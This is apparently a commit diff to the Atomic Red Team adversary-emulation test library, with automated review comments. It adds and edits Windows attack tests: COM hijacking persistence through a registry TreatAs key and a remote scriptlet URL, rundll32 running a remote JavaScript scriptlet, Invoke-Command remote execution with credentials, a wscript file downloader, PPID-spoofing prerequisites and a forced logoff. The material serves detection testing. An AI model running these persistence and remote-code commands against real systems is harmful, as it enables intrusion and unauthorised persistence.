+ name: sh
+ elevation_required: false
T1564.003:
technique:
x_mitre_platforms:
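Review bot: In the Log Stream test, `aws logs create-log-stream` and `aws logs delete-log-stream` omit `--region #{region}` while the surrounding create/delete-log-group calls pass it, so with a default profile region other than `us-west-2` the stream calls target a different region and fail with a missing group after the group has already been created. Add `--region #{region}` to both stream commands. Both tests leave `cleanup_command:` empty (parsed as null); an idempotent `aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region}` there would remove the group if the test aborts between create and delete. Smaller issues: the Log Group description says "deleting the log stream", and both `get_prereq_command` messages spell "defult".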
@@ -34335,6 +34431,16 @@ privilege-escalation:
get_prereq_command: |
New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}"
+ - description: 'PPID.ps1 must exist on disk at $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1
+
+ '
+ prereq_command: 'if (Test-Path $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1)
+ {exit 0} else {exit 1}
+
+ '
+ get_prereq_command: |
+ New-Item -Type Directory (split-path $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1) -ErrorAction ignore | Out-Null
+ Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1134.004/src/PPID-Spoof.ps1" -OutFile $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1
executor:
command: |
. $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1
@@ -36898,6 +37004,44 @@ privilege-escalation:
cleanup_command: Remove-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}'
-Recurse -ErrorAction Ignore
name: powershell
+ - name: COM hijacking via TreatAs
+ auto_generated_guid: 33eacead-f117-4863-8eb0-5c6304fbfaa9
+ description: |-
+ This test first create a custom CLSID class pointing to the Windows Script Component runtime DLL. This DLL looks for the ScriptletURL key to get the location of the script to execute.
+ Then, it hijacks the CLSID for the Work Folders Logon Synchronization to establish persistence on user logon by creating the 'TreatAs' with the malicious CLSID as default value. The
+ test is validated by running 'rundll32.exe -sta "AtomicTest"' to avoid logging out.
+
+ References:
+
+ https://youtu.be/3gz1QmiMhss?t=1251
+
+ https://github.com/enigma0x3/windows-operating-system-archaeology
+ supported_platforms:
+ - windows
+ executor:
+ command: "reg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest\" /ve
+ /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest.1.00\"
+ /ve /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest\\CLSID\"
+ /ve /T REG_SZ /d \"{00000001-0000-0000-0000-0000FEEDACDC}\" /f\nreg add
+ \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest.1.00\\CLSID\" /ve /T
+ REG_SZ /d \"{00000001-0000-0000-0000-0000FEEDACDC}\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\"
+ /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\"
+ /ve /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\InprocServer32\"
+ /ve /T REG_SZ /d \"C:\\\\WINDOWS\\\\system32\\\\scrobj.dll\" /f\nreg add
+ \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\InprocServer32\"
+ /v \"ThreadingModel\" /T REG_SZ /d \"Apartment\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\ProgID\"
+ /ve /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\ScriptletURL\"
+ /ve /T REG_SZ /d \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/src/TreatAs.sct\"
+ /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\VersionIndependentProgID\"
+ /ve /T REG_SZ /d \"AtomicTest\" /f\n\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\"
+ /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\\TreatAs\"
+ /ve /T REG_SZ /d \"{00000001-0000-0000-0000-0000FEEDACDC}\" /f\n\nrundll32.exe
+ -sta \"AtomicTest\" "
+ cleanup_command: |-
+ reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest" /f
+ reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /f
+ reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}" /f
+ name: powershell
T1574.009:
technique:
x_mitre_platforms:
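Review bot: The `cleanup_command` deletes `Classes\AtomicTest` and the two CLSID keys but not `HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00`, which the command creates together with its `CLSID` subkey, so a versioned ProgID pointing at the scriptlet CLSID survives cleanup. Add `reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00" /f` to the cleanup block. The description should also state that cleanup only removes registry keys and does not end a rundll32 host started by the final `rundll32.exe -sta "AtomicTest"` line if it is still running. The same entry is repeated under persistence in the `@@ -58867,6 +59011,44 @@` hunk and needs the same additional delete.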
@@ -58867,6 +59011,44 @@ persistence:
cleanup_command: Remove-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}'
-Recurse -ErrorAction Ignore
name: powershell
+ - name: COM hijacking via TreatAs
+ auto_generated_guid: 33eacead-f117-4863-8eb0-5c6304fbfaa9
+ description: |-
+ This test first create a custom CLSID class pointing to the Windows Script Component runtime DLL. This DLL looks for the ScriptletURL key to get the location of the script to execute.
+ Then, it hijacks the CLSID for the Work Folders Logon Synchronization to establish persistence on user logon by creating the 'TreatAs' with the malicious CLSID as default value. The
+ test is validated by running 'rundll32.exe -sta "AtomicTest"' to avoid logging out.
+
+ References:
+
+ https://youtu.be/3gz1QmiMhss?t=1251
+
+ https://github.com/enigma0x3/windows-operating-system-archaeology
+ supported_platforms:
+ - windows
+ executor:
+ command: "reg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest\" /ve
+ /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest.1.00\"
+ /ve /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest\\CLSID\"
+ /ve /T REG_SZ /d \"{00000001-0000-0000-0000-0000FEEDACDC}\" /f\nreg add
+ \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest.1.00\\CLSID\" /ve /T
+ REG_SZ /d \"{00000001-0000-0000-0000-0000FEEDACDC}\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\"
+ /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\"
+ /ve /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\InprocServer32\"
+ /ve /T REG_SZ /d \"C:\\\\WINDOWS\\\\system32\\\\scrobj.dll\" /f\nreg add
+ \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\InprocServer32\"
+ /v \"ThreadingModel\" /T REG_SZ /d \"Apartment\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\ProgID\"
+ /ve /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\ScriptletURL\"
+ /ve /T REG_SZ /d \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/src/TreatAs.sct\"
+ /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\VersionIndependentProgID\"
+ /ve /T REG_SZ /d \"AtomicTest\" /f\n\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\"
+ /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\\TreatAs\"
+ /ve /T REG_SZ /d \"{00000001-0000-0000-0000-0000FEEDACDC}\" /f\n\nrundll32.exe
+ -sta \"AtomicTest\" "
+ cleanup_command: |-
+ reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest" /f
+ reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /f
+ reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}" /f
+ name: powershell
T1137.004:
technique:
x_mitre_platforms:
@@ -67495,27 +67677,34 @@ lateral-movement:
'
name: powershell
elevation_required: true
- - name: Invoke-Command
+ - name: Remote Code Execution with PS Credentials Using Invoke-Command
auto_generated_guid: 5295bd61-bd7e-4744-9d52-85962a4cf2d6
description: |
Execute Invoke-command on remote host.
- Upon successful execution, powershell will execute ipconfig on localhost using `invoke-command`.
+ Upon successful execution, powershell will execute whoami on specified remote host using `invoke-command`.
supported_platforms:
- windows
input_arguments:
- host_name:
- description: Remote Windows Host Name
- type: String
- default: localhost
- remote_command:
- description: Command to execute on remote Host
- type: String
- default: ipconfig
+ username:
+ description: The username running the powershell command
+ type: string
+ default: "$env:USERNAME"
+ remotehost:
+ description: The remote hostname of the machine you are running the powershell
+ command on.
+ type: string
+ default: "$env:COMPUTERNAME"
+ password:
+ description: The password to be used with the user provided in the previous
+ input argument.
+ type: string
+ default: test12345
executor:
- command: 'invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}}
-
- '
+ command: |-
+ $SecPassword = ConvertTo-SecureString "#{password}" -AsPlainText -Force
+ $Cred = New-Object System.Management.Automation.PSCredential("#{username}", $SecPassword)
+ Invoke-Command -ComputerName "#{remotehost}" -Credential $Cred -ScriptBlock {whoami}
name: powershell
- name: WinRM Access with Evil-WinRM
auto_generated_guid: efe86d95-44c4-4509-ae42-7bfd9d1f5b3d
@@ -91310,6 +91499,21 @@ command-and-control:
command: 'certreq.exe -Post -config #{remote_file} c:\windows\win.ini #{local_path}'
cleanup_command: 'del #{local_path} >nul 2>&1'
name: command_prompt
+ - name: Download a file using wscript
+ auto_generated_guid: 97116a3f-efac-4b26-8336-b9cb18c45188
+ description: Use wscript to run a local VisualBasic file to download a remote
+ file
+ supported_platforms:
+ - windows
+ input_arguments:
+ vbscript_file:
+ description: Full path to the VisualBasic downloading the file
+ type: String
+ default: PathToAtomicsFolder\T1105\src\T1105-download-file.vbs
+ executor:
+ command: 'wscript.exe #{vbscript_file}'
+ cleanup_command: del Atomic-License.txt >nul 2>&1
+ name: command_prompt
T1001.002:
technique:
x_mitre_platforms:
@@ -96530,6 +96734,25 @@ impact:
'
name: bash
elevation_required: true
+ - name: Logoff System - Windows
+ auto_generated_guid: 3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4
+ description: 'This test performs a Windows system logoff as seen in [dcrat backdoor
+ capabilities](https://www.mandiant.com/resources/analyzing-dark-crystal-rat-backdoor)
+
+ '
+ supported_platforms:
+ - windows
+ input_arguments:
+ timeout:
+ description: Timeout period before shutdown (seconds)
+ type: Integer
+ default: 1
+ executor:
+ command: 'shutdown /l /t #{timeout}
+
+ '
+ name: command_prompt
+ elevation_required: true
initial-access:
T1133:
technique:
diff --git a/atomics/T1021.006/T1021.006.md b/atomics/T1021.006/T1021.006.md
index 5e070e13..2ec818bd 100644
--- a/atomics/T1021.006/T1021.006.md
+++ b/atomics/T1021.006/T1021.006.md
@@ -8,7 +8,7 @@ WinRM is the name of both a Windows service and a protocol that allows a user to
- [Atomic Test #1 - Enable Windows Remote Management](#atomic-test-1---enable-windows-remote-management)
-- [Atomic Test #2 - Invoke-Command](#atomic-test-2---invoke-command)
+- [Atomic Test #2 - Remote Code Execution with PS Credentials Using Invoke-Command](#atomic-test-2---remote-code-execution-with-ps-credentials-using-invoke-command)
- [Atomic Test #3 - WinRM Access with Evil-WinRM](#atomic-test-3---winrm-access-with-evil-winrm)
@@ -45,10 +45,10 @@ Enable-PSRemoting -Force
-## Atomic Test #2 - Invoke-Command
+## Atomic Test #2 - Remote Code Execution with PS Credentials Using Invoke-Command
Execute Invoke-command on remote host.
-Upon successful execution, powershell will execute ipconfig on localhost using `invoke-command`.
+Upon successful execution, powershell will execute whoami on specified remote host using `invoke-command`.
**Supported Platforms:** Windows
@@ -62,15 +62,18 @@ Upon successful execution, powershell will execute ipconfig on localhost using `
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| host_name | Remote Windows Host Name | String | localhost|
-| remote_command | Command to execute on remote Host | String | ipconfig|
+| username | The username running the powershell command | string | $env:USERNAME|
+| remotehost | The remote hostname of the machine you are running the powershell command on. | string | $env:COMPUTERNAME|
+| password | The password to be used with the user provided in the previous input argument. | string | test12345|
#### Attack Commands: Run with `powershell`!
```powershell
-invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}}
+$SecPassword = ConvertTo-SecureString "#{password}" -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential("#{username}", $SecPassword)
+Invoke-Command -ComputerName "#{remotehost}" -Credential $Cred -ScriptBlock {whoami}
```
diff --git a/atomics/T1021.006/T1021.006.yaml b/atomics/T1021.006/T1021.006.yaml
index d19b621d..0a47fb86 100644
--- a/atomics/T1021.006/T1021.006.yaml
+++ b/atomics/T1021.006/T1021.006.yaml
@@ -14,27 +14,34 @@ atomic_tests:
Enable-PSRemoting -Force
name: powershell
elevation_required: true
-- name: Invoke-Command
+- name: Remote Code Execution with PS Credentials Using Invoke-Command
auto_generated_guid: 5295bd61-bd7e-4744-9d52-85962a4cf2d6
description: |
Execute Invoke-command on remote host.
- Upon successful execution, powershell will execute ipconfig on localhost using `invoke-command`.
+ Upon successful execution, powershell will execute whoami on specified remote host using `invoke-command`.
supported_platforms:
- windows
input_arguments:
- host_name:
- description: Remote Windows Host Name
- type: String
- default: localhost
- remote_command:
- description: Command to execute on remote Host
- type: String
- default: ipconfig
+ username:
+ description: The username running the powershell command
+ type: string
+ default: $env:USERNAME
+ remotehost:
+ description: The remote hostname of the machine you are running the powershell command on.
+ type: string
+ default: $env:COMPUTERNAME
+ password:
+ description: The password to be used with the user provided in the previous input argument.
+ type: string
+ default: test12345
executor:
- command: |
- invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}}
+ command: |-
+ $SecPassword = ConvertTo-SecureString "#{password}" -AsPlainText -Force
+ $Cred = New-Object System.Management.Automation.PSCredential("#{username}", $SecPassword)
+ Invoke-Command -ComputerName "#{remotehost}" -Credential $Cred -ScriptBlock {whoami}
name: powershell
+
- name: WinRM Access with Evil-WinRM
auto_generated_guid: efe86d95-44c4-4509-ae42-7bfd9d1f5b3d
description: An adversary may attempt to use Evil-WinRM with a valid account to interact with remote systems that have WinRM enabled
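Review bot: The `password` input defaults to the placeholder `test12345` (L638), so with defaults the `Invoke-Command` at L645 will fail authentication against `$env:COMPUTERNAME`, and nothing in the description (L613-L615) tells the operator to override it; add a sentence such as `The password input must be set to the actual password of the account given in username; the default is a placeholder and will not authenticate.` The rewrite also drops the former `remote_command` argument and hard-codes `{whoami}` (L645), so the description's "execute whoami" is accurate but the test is no longer configurable — if that is intended, say so, otherwise reintroduce the argument. Because the password is expanded in clear text into the script (L643), it will be recorded by PowerShell script block logging on the running host; the description should warn that a throwaway account is expected rather than a real user credential. The added trailing blank line at L647 is inconsistent with the surrounding tests, which are not separated by blank lines.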
diff --git a/atomics/T1105/T1105.md b/atomics/T1105/T1105.md
index ffac8680..74f3f203 100644
--- a/atomics/T1105/T1105.md
+++ b/atomics/T1105/T1105.md
@@ -58,6 +58,8 @@ On Windows, adversaries may use various utilities to download tools, such as `co
- [Atomic Test #25 - certreq download](#atomic-test-25---certreq-download)
+- [Atomic Test #26 - Download a file using wscript](#atomic-test-26---download-a-file-using-wscript)
+
@@ -1132,4 +1134,41 @@ del #{local_path} >nul 2>&1
+
+
+
+## Atomic Test #26 - Download a file using wscript
+Use wscript to run a local VisualBasic file to download a remote file
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 97116a3f-efac-4b26-8336-b9cb18c45188
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| vbscript_file | Full path to the VisualBasic downloading the file | String | PathToAtomicsFolder\T1105\src\T1105-download-file.vbs|
+
+
+#### Attack Commands: Run with `command_prompt`!
+
+
+```cmd
+wscript.exe #{vbscript_file}
+```
+
+#### Cleanup Commands:
+```cmd
+del Atomic-License.txt >nul 2>&1
+```
+
+
+
+
+
diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml
index b49dd3c9..09356531 100644
--- a/atomics/T1105/T1105.yaml
+++ b/atomics/T1105/T1105.yaml
@@ -700,4 +700,18 @@ atomic_tests:
command: 'certreq.exe -Post -config #{remote_file} c:\windows\win.ini #{local_path}'
cleanup_command: 'del #{local_path} >nul 2>&1'
name: command_prompt
-
+
+- name: Download a file using wscript
+ auto_generated_guid: 97116a3f-efac-4b26-8336-b9cb18c45188
+ description: Use wscript to run a local VisualBasic file to download a remote file
+ supported_platforms:
+ - windows
+ input_arguments:
+ vbscript_file:
+ description: Full path to the VisualBasic downloading the file
+ type: String
+ default: PathToAtomicsFolder\T1105\src\T1105-download-file.vbs
+ executor:
+ command: 'wscript.exe #{vbscript_file}'
+ cleanup_command: del Atomic-License.txt >nul 2>&1
+ name: command_prompt
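Review bot: The executor at L718 passes the script path unquoted, `wscript.exe #{vbscript_file}`, so a `PathToAtomicsFolder` containing a space is split into two arguments and wscript reports a missing file; change it to `command: 'wscript.exe "#{vbscript_file}"'`. Unlike the T1134.004 change in this same commit, no `dependencies` entry checks that the `.vbs` exists on disk before running — add one with a `prereq_command` such as `if exist "#{vbscript_file}" (exit 0) else (exit 1)` and a matching `get_prereq_command`. The description (L709) should also name the artifact the test leaves behind (`Atomic-License.txt` in the executor's working directory, per L719) so an operator knows what to expect and what the cleanup removes; both the script's save path and the `del` are relative, so they presumably only agree when the working directory is unchanged — worth confirming.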
diff --git a/atomics/T1105/src/T1105-download-file.vbs b/atomics/T1105/src/T1105-download-file.vbs
new file mode 100644
index 00000000..2720a6e9
--- /dev/null
+++ b/atomics/T1105/src/T1105-download-file.vbs
@@ -0,0 +1,10 @@
+Set objWinHttp = CreateObject("WinHttp.WinHttpRequest.5.1")
+URL = "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt"
+objWinHttp.open "GET", URL, False
+objWinHttp.send ""
+Dim BinaryStream
+Set BinaryStream = CreateObject("ADODB.Stream")
+BinaryStream.Type = 1
+BinaryStream.Open
+BinaryStream.Write objWinHttp.responseBody
+BinaryStream.SaveToFile "Atomic-License.txt", 2
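Review bot: There is no check of the HTTP result after `objWinHttp.send ""` (L730), so a non-2xx response (for example a 404 from the raw URL at L728) writes the error page body to `Atomic-License.txt` and the test still appears to succeed; insert `If objWinHttp.Status <> 200 Then WScript.Quit 1` before the stream is created at L732. The stream is never closed after `SaveToFile` (L736); add `BinaryStream.Close` as the final statement. `URL` is used without a `Dim` while `BinaryStream` is declared (L731) — adding `Option Explicit` at the top and `Dim objWinHttp, URL` would make the script consistent and catch typos.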
diff --git a/atomics/T1134.004/T1134.004.md b/atomics/T1134.004/T1134.004.md
index 8702ca75..745d7f29 100644
--- a/atomics/T1134.004/T1134.004.md
+++ b/atomics/T1134.004/T1134.004.md
@@ -75,6 +75,16 @@ if (Test-Path #{dll_path}) {exit 0} else {exit 1}
New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}"
```
+##### Description: PPID.ps1 must exist on disk at $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1
+##### Check Prereq Commands:
+```powershell
+if (Test-Path $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1) -ErrorAction ignore | Out-Null
+Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1134.004/src/PPID-Spoof.ps1" -OutFile $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1
+```
diff --git a/atomics/T1134.004/T1134.004.yaml b/atomics/T1134.004/T1134.004.yaml
index 57bf810f..e05ab373 100644
--- a/atomics/T1134.004/T1134.004.yaml
+++ b/atomics/T1134.004/T1134.004.yaml
@@ -41,6 +41,13 @@ atomic_tests:
get_prereq_command: |
New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}"
+ - description: |
+ PPID.ps1 must exist on disk at $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1
+ prereq_command: |
+ if (Test-Path $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1) {exit 0} else {exit 1}
+ get_prereq_command: |
+ New-Item -Type Directory (split-path $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1) -ErrorAction ignore | Out-Null
+ Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1134.004/src/PPID-Spoof.ps1" -OutFile $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1
executor:
command: |
. $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1
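Review bot: The new dependency's description (L764) says `PPID.ps1 must exist` but every path in the hunk checks and downloads `PPID-Spoof.ps1` (L766, L768, L769); make them agree: `PPID-Spoof.ps1 must exist on disk at $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1`. The path is unquoted in `Test-Path`, `split-path` and `-OutFile`, while the preceding prerequisite in the same block quotes `"#{dll_path}"` (L762); a `$PathToAtomicsFolder` containing a space breaks all three commands, so wrap each occurrence in double quotes, e.g. `if (Test-Path "$PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1") {exit 0} else {exit 1}`. The enclosing test's executor continues past the end of this hunk.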
diff --git a/atomics/T1218.011/T1218.011.md b/atomics/T1218.011/T1218.011.md
index 8bc8b5c9..de88a8c0 100644
--- a/atomics/T1218.011/T1218.011.md
+++ b/atomics/T1218.011/T1218.011.md
@@ -45,7 +45,7 @@ Test execution of a remote script using rundll32.exe. Upon execution notepad.exe
**Supported Platforms:** Windows
-**auto_generated_guid:** cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be
+**auto_generated_guid:** 57ba4ce9-ee7a-4f27-9928-3c70c489b59d
@@ -61,9 +61,13 @@ Test execution of a remote script using rundll32.exe. Upon execution notepad.exe
```cmd
-rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();
+start /b rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();
```
+#### Cleanup Commands:
+```cmd
+taskkill /IM notepad.exe /f
+```
diff --git a/atomics/T1218.011/T1218.011.yaml b/atomics/T1218.011/T1218.011.yaml
index c8f9f654..6e158223 100644
--- a/atomics/T1218.011/T1218.011.yaml
+++ b/atomics/T1218.011/T1218.011.yaml
@@ -2,7 +2,7 @@ attack_technique: T1218.011
display_name: 'Signed Binary Proxy Execution: Rundll32'
atomic_tests:
- name: Rundll32 execute JavaScript Remote Payload With GetObject
- auto_generated_guid: cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be
+ auto_generated_guid: 57ba4ce9-ee7a-4f27-9928-3c70c489b59d
description: |
Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened.
supported_platforms:
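Review bot: Replacing `auto_generated_guid` (L798 → L799) changes the stable identity of an existing test, so any external coverage or detection mapping keyed on `cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be` silently stops matching; the GUID is meant to be stable across edits, and the only behavioural changes in this commit (a backgrounded launch and a cleanup command, in the following hunk) do not obviously warrant a new identity. If the new GUID is intentional, the commit message should state why; otherwise keep the original value and only change the executor.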
@@ -14,7 +14,9 @@ atomic_tests:
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.011/src/T1218.011.sct
executor:
command: |
- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();
+ start /b rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();
+ cleanup_command: |
+ taskkill /IM notepad.exe /f
name: command_prompt
- name: Rundll32 execute VBscript command
auto_generated_guid: 638730e7-7aed-43dc-bf8c-8117f805f5bb
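Review bot: The new cleanup at L810, `taskkill /IM notepad.exe /f`, terminates every notepad.exe in the session, not only the instance the remote scriptlet opens, so an operator's own open documents are killed; the test's description (L801, `Upon execution notepad.exe will be opened.`) should add `Cleanup force-closes all running notepad.exe instances.` `start /b` at L808 detaches rundll32.exe from the executor, and nothing in the cleanup addresses that process — if the scriptlet leaves rundll32 resident (verify on a target build), a second `taskkill` line or a note that the process is left running would make the cleanup honest.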
diff --git a/atomics/T1529/T1529.md b/atomics/T1529/T1529.md
index 7ea68bd4..08bebfec 100644
--- a/atomics/T1529/T1529.md
+++ b/atomics/T1529/T1529.md
@@ -24,6 +24,8 @@ Adversaries may attempt to shutdown/reboot a system after impacting it in other
- [Atomic Test #9 - Reboot System via `poweroff` - Linux](#atomic-test-9---reboot-system-via-poweroff---linux)
+- [Atomic Test #10 - Logoff System - Windows](#atomic-test-10---logoff-system---windows)
+
@@ -296,4 +298,37 @@ poweroff --reboot
+
+
+
+## Atomic Test #10 - Logoff System - Windows
+This test performs a Windows system logoff as seen in [dcrat backdoor capabilities](https://www.mandiant.com/resources/analyzing-dark-crystal-rat-backdoor)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| timeout | Timeout period before shutdown (seconds) | Integer | 1|
+
+
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
+
+
+```cmd
+shutdown /l /t #{timeout}
+```
+
+
+
+
+
+
diff --git a/atomics/T1529/T1529.yaml b/atomics/T1529/T1529.yaml
index bfbf82be..de248b1b 100644
--- a/atomics/T1529/T1529.yaml
+++ b/atomics/T1529/T1529.yaml
@@ -123,3 +123,19 @@ atomic_tests:
poweroff --reboot
name: bash
elevation_required: true
+- name: Logoff System - Windows
+ auto_generated_guid: 3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4
+ description: |
+ This test performs a Windows system logoff as seen in [dcrat backdoor capabilities](https://www.mandiant.com/resources/analyzing-dark-crystal-rat-backdoor)
+ supported_platforms:
+ - windows
+ input_arguments:
+ timeout:
+ description: Timeout period before shutdown (seconds)
+ type: Integer
+ default: 1
+ executor:
+ command: |
+ shutdown /l /t #{timeout}
+ name: command_prompt
+ elevation_required: true
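Review bot: `shutdown /l` at L877 logs off the user running the executor, so the invoking runner session is terminated and nothing after the command (including any future cleanup) can run; the description at L867 should say so, e.g. `This test ends the current interactive session; unsaved work is lost and the runner is terminated.` The `/l` switch in shutdown.exe's usage text documents an immediate logoff without a time-out, so `/t #{timeout}` may be rejected or ignored — verify on a target build, and if `/t` is not honoured, drop the `timeout` argument (L871-L874) rather than advertise a delay that does not happen; its description `Timeout period before shutdown (seconds)` should in any case read `before logoff`. `elevation_required: true` (L879) looks unnecessary for logging off one's own session, presumably copied from the neighbouring shutdown tests — confirm.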
diff --git a/atomics/T1546.015/T1546.015.md b/atomics/T1546.015/T1546.015.md
index ce6a555d..7eb9d858 100644
--- a/atomics/T1546.015/T1546.015.md
+++ b/atomics/T1546.015/T1546.015.md
@@ -12,6 +12,8 @@ Adversaries can use the COM system to insert malicious code that can be executed
- [Atomic Test #3 - COM Hijacking with RunDLL32 (Local Server Switch)](#atomic-test-3---com-hijacking-with-rundll32-local-server-switch)
+- [Atomic Test #4 - COM hijacking via TreatAs](#atomic-test-4---com-hijacking-via-treatas)
+
